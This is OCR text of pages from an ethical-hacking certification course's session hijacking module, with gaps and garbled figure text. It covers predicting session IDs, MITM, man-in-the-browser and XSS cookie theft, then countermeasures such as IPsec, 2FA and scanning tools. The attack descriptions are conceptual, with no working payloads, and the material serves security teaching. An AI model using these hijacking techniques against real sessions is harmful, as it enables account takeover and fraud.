Compromising Session IDs by Predicting Session Token Asession ID is tagged as proof of an authenticated session established between a user and web server. Thus, if an attacker can guess or predict the session ID of the user, fraudulent activity is possible. Session prediction enables an attacker to bypass the authentication schema of an application. Usually, attackers can predict session IDs generated by weak algorithms and impersonate a website user. Attackers analyze a variable section of session IDs to determine the existence of a pattern. This analysis is performed either manually or by using various cryptanalytic tools. An attacker collect a high number of simultaneous session IDs to gather samples in the same time window and keep the variable constant. First, the attacker collects some valid session IDs that are useful in identifying authenticated users. The attacker then studies the session ID structure, the information used to generate it, and the algorithm used by the web application to secure it. From these findings, the attacker can predict the session ID. Attackers can also guess session IDs by using a brute-force technique, in which they generate and test different session ID values until they succeed in gaining access to the application.
Module 11 Page 1530
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
How to Predict a Session Token ‘|@
Most web servers use custom algorithms or a predefined pattern to generate session IDs
‘@
Anattacker guesses the unique session value or deduces the session ID to hijack the session
Captures
http://www. http://www. http://www. http://www.
An attacker captures several session IDs and analyzes the
pattern
certifiedhacker. certifiedhacker. certifiedhacker. certifiedhacker.
com/view/JBEX12042022152820 com/view/JBEX12042022153020 com/view/JBEX12042022160020 com/view/JBEX12042022164020
Constant
Date
Time
Predicts At 16:25:55 on April 14, 2022,
the attacker can successfully predict the session ID
|
http://www. certifiedhacker. com/view/JBEX14042022162555,
Constant
Date
Time
How to Predict a Session Token Most web servers generate session IDs using custom algorithms or a pre-defined pattern that might simply increase static numbers, whereas others use more complex procedures such as factoring in time and other computer-specific variables. Thus, attackers can identify session IDs generated in the following ways: =
Embedding in the URL, which is received by a GET request in the application when the links embedded within a page are clicked by clients
=
Embedding in a form as a hidden field, which is submitted to the HTTP’s POST command
=
Embedding in cookies on the client’s local machine
An attacker guesses the unique session value or deduces the session ID to hijack the session. As shown in the below figure, an attacker first captures several session IDs and analyzes the
pattern.
http: //www.certifiedhacker .com/view/JBEX12042022152820 http: //www.certifiedhacker .com/view/JBEX12042022153020 http: //www.certifiedhacker .com/view/JBEX12042022160020 http: //www.certifiedhacker .com/view/JBEX12042022164020 Constant
Date
Time
Figure 11.9: Sample sessions captured by an attacker
Module 11 Page 1531
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
On analyzing the pattern, at 16:25:55 on April 14, 2022, the attacker successfully predicts the session ID, as shown in the below figure. http: //www.certifiedhacker
.com/view/JBEX14042022162555 Constant
Date
Time
Figure 11.10: Session ID predicted by the attacker
Now, the attacker can mount an attack through the following steps. =
The attacker acquires the current session ID and connects to the web application.
=
The attacker implements a brute-force technique or calculates the next session ID.
=
The attacker modifies the current assumes the next user’s identity.
Module 11 Page 1532
value
in the
cookie/URL/hidden
form
field
and
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Compromising Session IDs Using Man-in-the-Middle/ Manipulator-in-the-Middle Attack ‘@
C IE H bod bral
The man-in-the-middle/manipulator-in-the-middle attack is used to intrude into an existing connection between systems and intercept the messages being exchanged
@ Attackers use different techniques and split the TCP connection into two connections:
@ Client-to-attacker connection @ Attacker-to-server connection
@ After the interception of the TCP connection, an attacker can read, modify, and insert fraudulent
data into the intercepted communication ‘@
In the case of an http transaction, the TCP connection between the client and the server
becomes the target
Compromising
Middle Attack
Session
IDs
Using
Man-in-the-Middle/Manipulator-in-the-
A man-in-the-middle/manipulator-in-the-middle (MITM) attack is used to intrude into an existing connection between systems and to intercept messages being transmitted. In this attack, attackers use different techniques and split a TCP connection into two: a client-toattacker connection and an attacker-to-server connection. After the successful interception of a TCP connection, an attacker can read, modify, and insert fraudulent data into the intercepted communication. In the case of an HTTP transaction, the TCP connection between the client and server is the target. Victim
¢ MITM Connection
Web Server
MITM
Connectior
Figure 11.11: Prediction of session ID using a man-in-the-middle (MITM) attack
Module 11 Page 1533
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Compromising Session IDs Using Man-in-the-Browser /Manipulator-in-the-Browser Attack
C IE H .
‘@
The man-in-the-browser/manipulator-in-thebrowser attack uses a Trojan horse to intercept the calls between the browser and its security mechanisms or libraries
‘@
It works with an already installed Trojan horse and acts between the browser and its security mechanisms
‘@
Its main objective is to cause financial deceptions by manipulating transactions of Internet banking systems
ml,
Steps to Perform Man-in-the-Browser Attack The Trojan first infects the computer's software (OS or application)
CE H
When the user clicks on the button, the extension uses DOM interface and extracts all the data from all form fields and modifies the values
The Trojan installs malicious code (extension files) and saves it into the
9 | ‘The browsersends the form and modified values to the server
After the user restarts the browser, the malicious code in the form of extension files is loaded
‘The server receives the modified values but cannot distinguish between the original and the modified values
browser configuration
The extension files register a handler for every visit to the webpage
| 11 | After the server performs the transaction, a receipt is generated
‘When is loaded, the extension uses the URL and matches it with a the list ofpageknown sites targeted for attack
| 12 | Now, the browser receives the receipt for the modified transaction
The user logs in securelyto the website
| 13 | The browser displays the receipt with the original details
The Trojan registers a button event handler when a specific page load is detected fora specific pattern and compares it with its targeted list
‘The user thinks that the original transaction was received by the server without any interceptions Al RightsReserved Reproduction i Strictly Prohibited
Compromising
Browser Attack
Session
IDs
Using
Man-in-the-Browser/Manipulator-in-the-
A man-in-the-browser/manipulator-in-the- browser attack is similar to an MITM attack. The difference between the two is that a man-in-the-browser attack uses a Trojan horse to intercept and manipulate calls between a browser and its security mechanisms or libraries. An attacker positions a previously installed Trojan between the browser and its security
Module 11 Page 1534
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
mechanism, and the Trojan can modify web pages and transaction content or insert additional transactions. All of the Trojan’s activities are invisible to both the user and web application. The main objective of this attack is financial theft by manipulating transactions made using Internet banking systems. A man-in-the-browser attack can succeed even in the presence of security mechanisms such as SSL, public key infrastructure (PKI), and two-factor authentication because all the expected controls and security mechanisms would seem to function normally. Steps to Perform Man-in-the-Browser Attack:
=
The Trojan first infects the computer’s software (OS or application).
=
The Trojan installs malicious code (extension files) and saves it in the browser configuration.
=
After the user restarts the browser, the malicious code in the form of extension files is loaded.
=
The extension files register a handler for every visit to a webpage.
=
When a page is loaded, the extension matches its URL with a list of known sites targeted for attack.
=
The user logs in securely to the website.
=
The extension registers a button event handler when a specific page load is detected with a specific pattern and compares it with its targeted list.
=
When the user clicks on the button, the extension uses the Document Object Model (DOM) interface and extracts all the data from all form fields and modifies the values.
=
The browser sends the form and modified values to the server.
=
The server receives the modified values but cannot distinguish between the original and modified values.
=
After the server performs the transaction, a receipt is generated.
=
Now, the browser receives the receipt for the modified transaction.
=
The browser displays the receipt with the original details.
=
The user believes that the original transaction was received by the server without any interception.
Module 11 Page 1535
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Compromising Session IDs Using Client-side Attacks Cross-Site Scripting (XSS) @ XSS enables attackers to inject malicious client-side scripts into the web pages viewed by other users
CE H
Client
Malicious JavaScript Codes @ Amialicious script can be embedded in a web page that does not generate any warning, but it captures session tokens in the
background and sends them to the attacker Trojans
@ A Trojan horse can change the proxy settings in the user’s browser to send all the sessions through the attacker’s machine
Malidous Server
Compromising Session IDs Using Client-side Attacks Client-side attacks target vulnerabilities in client applications that interact with a malicious server or process malicious data. Depending on the nature of vulnerabilities, an attacker can exploit an application by sending an email with a malicious link or otherwise tricking a user into visiting a malicious website. Vulnerable client-side applications include unprotected websites, Java Runtime Environment, and browsers; of these, browsers are the major target. Client-side attacks occur when clients establish connections with malicious servers and process potentially harmful data from them. If no interaction occurs between the client and server, then there is no scope for a client-side attack. One such example is running a File Transfer Protocol (FTP) client without establishing a connection to an FTP server. In the case of instant messaging, the application is configured in such a way that it makes clients to log in to a remote server, making it susceptible to client-side attacks. The following client-side attacks can be used to compromise session IDs. =
Cross-site scripting (XSS): XSS enables attackers to inject malicious
=
Malicious JavaScript codes: An attacker can embed in a web page a malicious script that does not generate any warning but captures session tokens in the background and
into web pages viewed by other users.
client-side scripts
sends them to the attacker. =
Trojans: A Trojan horse can change the proxy settings in the user’s browser to send all sessions through an attacker’s machine.
Module 11 Page 1536
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Session Hijacking
Malicious Server
Response
Attack
Request
Gi
Client
Server
Figure 11.12: Prediction of session ID using a client-side attack
Module 11 Page 1537
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Compromising Session IDs Using Client-side Attacks: Cross-site Script Attack
cE H Ped othe
@ If an attacker sends a crafted link to the victim with malicious JavaScript, the JavaScript will run and complete the instructions made by the attacker when the victim clicks on the link
User User clicks on link; the malicious JavaScript run:
JSESSIONID=8FEBOASSF1E3E ‘898E342E07ADA127144,
Establishes session
z http: //janaina:8080
e
‘Attacker sends malicious link with malicious JavaScript crafted i
structions made by the attacker and confirms the session identifier, thus attacker steals the session identifier
Compromising Session IDs Using Client-side Attacks: Cross-site Script Attack A cross-site script attack is a client-side attack in which the attacker compromises a session token by using malicious code or programs. This type of attack occurs when a dynamic web page receives malicious data from the attacker and executes it on the user’s system. Web sites that create dynamic pages do not have control over how the clients read their output. Thus, attackers can insert a malicious JavaScript, VBScript, Activex, Hypertext Markup Language (HTML), or Flash applet into a vulnerable dynamic page. That page then executes the script
on
the
user’s
machine
and
collects
personal
information
of the
user,
steals
cookies,
redirects users to unexpected web pages, or executes any malicious code on the user’s system. As shown in the below figure, a user first establishes a valid session with a server. An attacker sends a crafted link to the victim with malicious JavaScript. When the user clicks on the link, the JavaScript runs automatically and performs the instructions set by the attacker. The result displays the current session ID of the user. Using the same technique, the attacker can create specific JavaScript code that fetches the user’s session ID:
Thereafter, the attacker uses the stolen session ID to establish a valid session with the server.
Module 11 Page 1538
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
= Al
P|
User User clicks on that
3 e
Tink; the malicious
JavaScript runs.
3% Invalid Public Key
Wob
Server
Figure 11.38: Implementation of HPKP
Module 11 Page 1587
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
=
Exam 312-50 Certified Ethical Hacker
HTTP Referrer Header When a user visits a web page, the browser will set a referrer header. It contains the URL or URI of the web page, which can be used to navigate to the target web page along with the IP address and session ID. Fingerprinting the referrer header of each request will help in identifying the changes in the HTTP headers. When the attacker tries to hijack the session using a valid session ID, the HTTP header differs. Consequently, the intrusion gets detected and the session is terminated. (1)
Browser sets the Referrer header
Tet
VY Valid header
Client
a 2 aneeee Seneca
Web Server
Figure 11.39: Implementation of HTTP referrer header
Module 11 Page 1588
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Approaches to Prevent MITM Attacks DNS over HTTPS
|
CE H
|G DNS over HTTPS (DoH) is an enhanced version of DNS protocol, which is used to prevent snooping of user’s web activities or DNS queries during the DNS lookup process
(@
The web queries and traffic are sent through encrypted HTTPS via port 443
2
mae
Port hai!
Secure tunnel
443 Port
taf vinmsninoenres
ie =
.
Conventional DNS queries
53
“
4
DNS Resolver DNS Client
Attacker
Approaches to Prevent MITM Attacks (Cont’d) WEP/WPA. Encryption
VPN
CE H
©
WEP and WPAare different wireless protocols that are intended to protect the traffic that is sent and received by users over a wireless network | | @ The implementation of these protocols can thwart unwanted users connecting to the network and prevent MITM attacks
|
© AVPN creates a safe andencrypted tunnel over a public network to securely send and receive sensitive information @
The implementation of VPN in the network prevents attackers from decrypting the data flowing between the
@
A two-factor authentication provides an extra layerof protection as it provides another vectorof authentication in addition
endpoints
awe password ‘Two-Factor | Authentication © The implementation of two-factor authentication can prevent attackers from performing session hijacking and brute-forcing their way into a user account
Password Manager
Zero-trust
Principles
|
|
© Password manager is an application/tool used to protect andmanage individual credentials Using a password manager, passwords are stored in a secure location and encapsulated using a master key to prevent MITM. attacks © Zero-trust principles are a set of standardized user pre-verification procedures that requires all users (inside or outside) to be authenticated before providing access to any resources
© These principles work based on the famous phrase, “Trust but verify”
Approaches to Prevent MITM Attacks Man-in-the-middle (MITM) attacks are the most common type of attack, wherein the attackers intercept the traffic between two endpoints. The victim may not realize the effect of this attack, because it is mostly passive in nature. Because the detection of MITM attacks is difficult, they can only be prevented using various measures.
Module 11 Page 1589
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
The following are some approaches to prevent MITM attacks: =
DNS over HTTPS
DNS over HTTPS (DoH) is an enhanced version of the DNS protocol that is used to prevent the peeking or snooping of user’s web activities or DNS queries during the DNS lookup process. The protocol is different than the conventional DNS protocol since the web queries and the traffic is sent through a secured or encrypted HTTPS tunnel via port 443. Implementing DNS over HTTPS makes the traffic undetectable by the attackers or ISPs since it gets hidden within the normal traffic passing through the HTTPS port. Unlike the traditional DNS lookup process, the DoH sends a segment of a necessary domain name to fetch the results instead of sending the complete domain name entered by a user. This protocol helps in ensuring user’s privacy and security as the web traffic is directed only between DoH supported clients and a resolver avoiding MITM and session hijacking attacks. Web browsers such as Chrome, Mozilla, and Microsoft Edge have been implementing this protocol for the past few years and Mozilla had already adopted this protocol as default from 2020 for its US clients.
Secure tunnel
DNS Resolver DNS Client ‘Attacker Figure 11.40: DNS over HTTPS
=
WEP/WPA Encryption Wired Equivalent Privacy (WEP) and Wireless Protected Access (WPA) are wireless protocols that are intended to protect the traffic that is sent and received by users over a wireless network. The implementation of these protocols can thwart the attempts of unwanted users to connect to the network. A weak encryption mechanism enables attackers to brute force credentials and enter the target network to perform an MITM attack.
=
VPN
A VPN creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information. It creates a subnet by using key-based encryption for secure communication between endpoints. The implementation of a VPN in the network prevents attackers from decrypting the data flowing between the endpoints.
Module 11 Page 1590
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking =
Exam 312-50 Certified Ethical Hacker
Two-Factor Authentication Two-factor authentication provides an extra layer of protection because it serves as a vector of authentication in addition to a user’s password. Therefore, the implementation of two-factor authentication can prevent attackers from performing session hijacking and brute forcing to compromise a user’s account.
=
Password Manager Password Manager is an application or tool used to protect and credentials. The tool can also help in producing unique and complex applications. Using the password manager, passwords can be stored under the database and encapsulated using a master key to prevent
=
manage individual passwords for web in a secure location MITM attacks.
Zero-trust Principles Zero-trust principles constitute a set of standardized user pre-verification procedures that requires all users (inside or outside) to be authenticated before providing access to any resource. These principles are based on the famous phrase, “Trust but verify.” Even though the request is made from the internal network, the authentication process is similar to that for an outsider.
Module 11 Page 1591
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
IPsec
CE H
‘@
|Psec is a protocol suite developed by the IETF for securing IP communications by authenticating and
‘@
Itis deployed widely to implement VPNs and for remote user access through dial-up connection to private
encrypting each IP packet of a communication session
networks
Components of IPsec @
Benefits of IPsec
IPsec Driver
© @
Internet Key Exchange (IKE) Internet Security Association Key Management Protocol © Oakley @
IPsec Policy Agent —
©
Network-level peer authentication
© ©
Data origin authentication Data integrity
@
Data confidentiality (encryption)
©
Replay protection
ed
L
4
IPsec (Cont’d) Modes of IPsec
Transport Mode
Internet
a
=
—_Transport-mode encapsulation | sce | Wansporedata [irsector header | header | (rc, uor,etc) | (ESPonh)
Tunnel Mode —_Tunnel—mode encapsulation
=
ESP Protocol
ey
Encryption Algorithm
| |
IPsec Internet Protocol Security (IPsec) is a set of protocols that the Internet Engineering Task Force IETF) developed to support the secure exchange of packets at the IP layer. It ensures interoperable cryptographically based security for IPv4 and IPv6, and it supports network-level peer authentication, data origin authentication, data integrity, data confidentiality (encryption), and replay protection. It is widely used to implement VPNs and for remote user access through
Module 11 Page 1592
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
dial-up connection to private networks. It supports transport and tunnel encryption although sending and receiving devices must share a public key.
modes,
IPsec policies can be assigned through the Group Policy configuration of Active Directory domains, organizational units, and IPsec deployment policies at the domain, site, or organizational-unit level. The security services offered by IPsec include the following: =
Rejection of replayed packets (a form of partial sequence integrity)
=
Data confidentiality (encryption)
=
Access control
=
Connectionless integrity
=
Data origin authentication
=
Data integrity
=
Limited traffic-flow confidentiality
=
Network-level peer authentication
=
Replay protection
At the IP layer, IPsec provides all the above-mentioned services, offering the protection of IP and/or upper-layer protocols such as TCP, UDP, ICMP, and Border Gateway Protocol (BGP). Components of IPsec
=
IPsec driver: Software that performs protocol-level functions required to encrypt and decrypt packets.
=
Internet Key Exchange (IKE): An protocol that produces security keys for IPsec and other protocols.
=
Internet Security Association and Key Management Protocol (ISAKMP): Software that allows two computers to communicate by encrypting the data exchanged between them.
=
Oakley: A protocol that uses the Diffie-Hellman algorithm to create a master key and a key that is specific to each session in IPsec data transfer.
=
IPsec Policy Agent: A service included in Windows OS that enforces IPsec policies for all the network communications initiated from that system.
The following are the steps involved in the IPsec process.
=
Aconsumer sends a message to a service provider.
=
The consumer's IPsec driver attempts to match the outgoing packet's address or the packet type against the IP filter.
=
The IPsec provider.
=
The service provider's ISAKMP receives the security negotiation request.
Module 11 Page 1593
driver
notifies
ISAKMP
to initiate
security
negotiations
with
the
service
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
=
Both principles initiate a key exchange, establishing an ISAKMP Security Association (SA) and a shared secret key.
=
Both principles discuss the security level for the information exchange, establishing both IPsec SAs and keys.
=
The consumer's IPsec driver transfers packets to the appropriate connection type for transmission to the service provider.
=
The provider receives the packets and transfers them to the IPsec driver.
=
The provider's IPsec uses the inbound SA and begin decryption.
key to check the digital signature and
=
The provider's IPsec driver transfers decrypted further processing.
packets to the OSI transport layer for
Modes of IPsec The configuration of IPsec involves two different modes: the tunnel mode and transport mode. These modes are associated with the functions of two core protocols: the Encapsulation Security Payload (ESP) and Authentication Header (AH). The model selection depends on the requirements and implementation of IPsec.
=
Transport Mode In the transport mode (also ESP), IPsec encrypts only the payload of the IP packet, leaving the header untouched. It authenticates two connected computers and provides the option of encrypting data transfer. It is compatible with network address translation (NAT); therefore, it can be used to provide VPN services for networks utilizing NAT. id
a
Internet
c
*,
*
:
Transport — mode encapsulation
IP
header
IPsec
Transport data
| header
(TCP, UDP, etc.)
Figure 11.41: Transport mode encapsulation
=
Tunnel Mode In the tunnel mode (also AH), the IPsec encrypts both the payload and header. Hence, in the tunnel mode has higher security than the transport mode. After receiving the data, the IPsec-compliant device performs decryption. The tunnel model is used to create
Module 11 Page 1594
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
VPNs over the Internet for network-to-network communication (e.g., between routers and link sites), host-to-network communication (e.g., remote user access), and host-tohost communication (e.g., private chat). It is compatible with NAT and supports NAT traversal.
In the tunnel mode, the system encrypts entire IP packets (payload and IP header) and encapsulates the encrypted packets into a new IP packet with a new header. In this mode, ESP encrypts and optionally authenticates entire inner IP packets, whereas AH authenticates entire inner IP packets and selected fields of outer IP headers. The tunnel mode is usually useful between two gateways or between a host and gateway. etnies
authenticated
>
Figure 11.42: Tunnel mode encapsulation
IPsec Architecture IPsec offers security services at the network layer. This provides the freedom to select the required security protocols as well as the algorithms used for services. To provide the requested services, the corresponding cryptographic keys can be employed, if required. Security services offered by IPsec include access control, data origin authentication, connectionless integrity, anti-replay, and confidentiality. To meet these objectives, IPsec uses two traffic security protocols, AH and ESP, as well as cryptographic key management protocols and procedures. The protocol structure of the IPsec architecture is as follows.
Authentication Header (AH): optional anti-replay features.
It offers integrity and
data
origin
authentication,
with
Encapsulating Security Payload (ESP): It offers all the services offered by AH as well as confidentiality. IPsec Domain of Interpretation (DOI): It defines the payload formats, types of exchange, and naming conventions for security information such as cryptographic algorithms or security policies. IPsec DOI instantiates ISAKMP for use with IP when IP uses ISAKMP to negotiate security associations.
Module 11 Page 1595
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking =
Internet protocol
Exam 312-50 Certified Ethical Hacker
Security Association and in the IPsec architecture
communications over communications, by
Key Management Protocol (ISAKMP): It is a key that establishes the required security for various
the Internet, such as government, combining the security concepts
private, and commercial of authentication, key
management, and security associations.
=
Policy: IPsec policies are useful in providing network security. They define when and how to secure data, as well as security methods to use at different levels in the network. One can configure IPsec policies to meet the security requirements of a system, domain, site, organizational unit, and so on. IPsec Architecture
Vv
[
(te ee eeeeeeeeeeeeeeeenas
Cee
AH Protocol
ESP Protocol
vv
.
Authentication
Vv
.
.
Encryption Algorithm
Algorithm
IPsec Domain of seneccaronees>>y
Policy
}of
Interpretation
(DO!
Key Management
]
A Figure 11.43: IPsec architecture
Module 11 Page 1596
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
CEH
IPsec Authentication and Confidentiality ‘@
IPsec uses two different
security services for authentication and
confidentiality ® Authentication Header (AH): Providesthe data authentication of the sender @ Encapsulation Security Payload (ESP): Provides both the data authentication and encryption (confidentiality)of the sender
Fle Action View Help ¢9%\/26/63\/En Bh Seeutty Settings
Be
‘Name Description Policy signed 1P Security Policy Wierd Baiscree 7 Windows Defender Frenall ith Advanc} 1Security Policy Nome 5 Netoist Manager Policies Nae the P Seay poly and prove abe denen [Pub Key Policies Softwar Reston Plces
ast Mea x
oi Copyright © by
IPsec Authentication and Confidentiality IPsec uses two different security services for authentication and confidentiality. =
Authentication Header (AH): It is useful in providing connectionless integrity and data origin authentication for IP datagrams and anti-replay protection for the data payload and some portions of the IP header of each packet. However, it does not support data confidentiality (no encryption). A receiver can select the service to protect against replays, which is an optional service on establishing a security association (SA).
=
Encapsulation Security Payload (ESP): In addition to the services (data origin authentication, connectionless integrity, and anti-replay service) provided by AH, the ESP protocol offers confidentiality. Unlike AH, ESP does not provide integrity and authentication for the entire IP packet in the transport mode. ESP can be applied alone, in conjunction with AH, or in a nested manner. It protects only the IP data payload in the default setting. In the tunnel mode, it protects both the payload and IP header.
Module 11 Page 1597
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
File
Action
e9\a2nl
View
Exam 312-50 Certified Ethical Hacker
Help
SBibm|
|
ae
BB Security Settings
| | Name
> (1 Account Policies
> (1 Local Policies > 1) Windows Defender Firewall with Advanci
Network List Manager Policies Public Key Policies
Description
Policy Assigned
Last Mod
IP Security Policy Wizard
IP Securityhs Policy IP's Name
x
are provide a brief
> 15 Software Restriction Poli > (5) Application Control Poli
> [5] Advanced Audit Policy Configuration
< Back
Cancel
Figure 11.44: Screenshot of local IPsec policy on Windows
Module 11 Page 1598
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Session Hijacking Prevention Tools (XSAST is a unique source code analysis solution
CxSAST | that provides tools to identify, track, and repair technical and logical flaws in the source code
|
CE H
Fiddler is used for the security testing of web applications, such as Fiddler | decrypting HTTPS trafficand manipulating requests using a MITM decryption technique
Update SAST endpoints in database
a= j Session Hijacking Prevention Tools:
‘http://w checkmare.com
http://www telercom
© Nessus (https://www.tenable.com)
© Invicti (nteps://www.invct.com)
|
Session Hijacking Prevention Tools To prevent session hijacking, the security testing of web applications and the analysis of static code to identify vulnerabilities in web applications are required. Identifying vulnerabilities at an early stage helps in implementing security measures to protect against session hijacking attacks.
Module 11 Page 1599
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking =
Exam 312-50 Certified Ethical Hacker
CxSAST
Source: https://www.checkmarx.com Checkmarx CxSAST is a unique source-code analysis solution that provides tools for identifying, tracking, and repairing technical and logical flaws in source code, such as security vulnerabilities, compliance issues, and business logic problems. CxSAST supports open-source analysis (CxOSA), enabling licensing and compliance management, vulnerability alerts, policy enforcement, and reporting. This tool supports a wide range of OS platforms, programming languages, and frameworks.
Security professionals can use this tool to prevent various session hijacking attacks such as MITM attacks, session fixation attacks, and XSS attacks.
CH@CKMARX CxPostinstall 0.9.0
Update SAST endpoints in database Current state SAST Application URI
After update http://hostname.com
Server public origin
Identity Authority URI CxARM
http://hostname.com/CxRestAPI/auth
URI
Figure 11.45: Screenshot of CxSAST.
Module 11 Page 1600
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking =
Exam 312-50 Certified Ethical Hacker
Fiddler
Source: https://www.telerik.com Fiddler is used for performing web-application security tests such as the decryption of HTTPS traffic and manipulation of requests using an MITM decryption technique. Fiddler is a web debugging proxy that logs all HTTP(S) traffic between a computer and the Internet.
Security professionals can use Fiddler to test web applications by debugging the traffic from systems as well as manipulating and editing web sessions. © Telerik Fiddter Web Debugger
7
fie 588 Bier Took Yew Help EY cect
Cache FT TetWicard |B Tearff | MSON Search. Find [Ak Save lB CB Browse - GeCler |i Decode Keep: Alsesions > GB Any Process [BE Winconfig CD 7 Reply + b Go |WSiream Sil
:
Bo rms
demain
Se
Breen
y
Ot
CoE
eevee vtcrnyanaoen
Feed itcrreriat wesrare
Boney (Sesto
Online x
nesronse ees (ty Conent-Type) SIGCHI
oops me ters rs
neal
x
Bee esceeaaSSAKSTE
zi (Si |Ba
@ Composer
@
o
r
‘Show chart
eT
1/28 | seb. peiiomscton
Figure 11.46: Screenshot of Fiddler
The following are some additional session hijacking prevention tools:
=
Nessus (https://www.tenable.com)
=
Invicti (https://www.invicti.com)
=
Wapiti (https://wapiti-scanner.github.io)
=
WebWatchBot (https://www.exclamationsoft.com)
Module 11 Page 1601
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Module Summary Oo
Q
=
CEH
inthis module, we have discussed the following:
> Session hijacking concepts and different types of session hijacking ,
>
Application-level and network-level session hijacking attacks
> Various session hijacking tools
> Howto detect, protect, and defend against session hijacking attacks, as well as various session hijacking detection and prevention tools > We concluded with a detailed discussion on various countermeasures to be employed to prevent session hijacking attempts by threat actors
Q Inthe next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, evade network security components such as IDSs and firewallsto compromise the infrastructure
Module Summary In this module, we discussed concepts related to session hijacking, along with different types of session hijacking. We also discussed in detail application-level and network-level session hijacking attacks. Furthermore, various session hijacking tools were presented. We also discussed how to detect, protect, and defend against session hijacking attacks, in addition to various session hijacking detection and prevention tools. We concluded with a detailed discussion on various countermeasures to be employed to prevent session hijacking attempts by threat actors. In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen testers, evade network security components such as IDSs and firewalls to compromise network
infrastructure.
Module 11 Page 1602
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
C'EH
Certified
Ethical
EC-Council
Hacker
MODULE 12
—— EVADING IDS, FIREWALLS, —— ¢ AND HONEYPOTS
EC-COUNCIL OFFICIAL CURRICULA
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
CEH
LO#01: Summarize IDS, IPS, Firewall, and Honeypot
Concepts
© LO#02: Demonstrate IDS, IPS, Firewall, and Honeypot Solutions
o
© LO#03: Demonstrate Different Techniques to Bypass IDS
o
o
LEARNING
OBJECTIVES
LO#05: Demonstrate Different Techniques
to Bypass NAC and Endpoint Security
© LO#06: Use IDS/Firewall Evading Tools © LO#07: Demonstrate Different Techniques to Detect Honeypots
LO#04: Demonstrate Different Techniques to Bypass Firewalls
LO#08: Explain IDS/Firewall Evasion Countermeasures
Copyright © by
Al RightsReserved, Reproduction
i Strictly Prohibited.
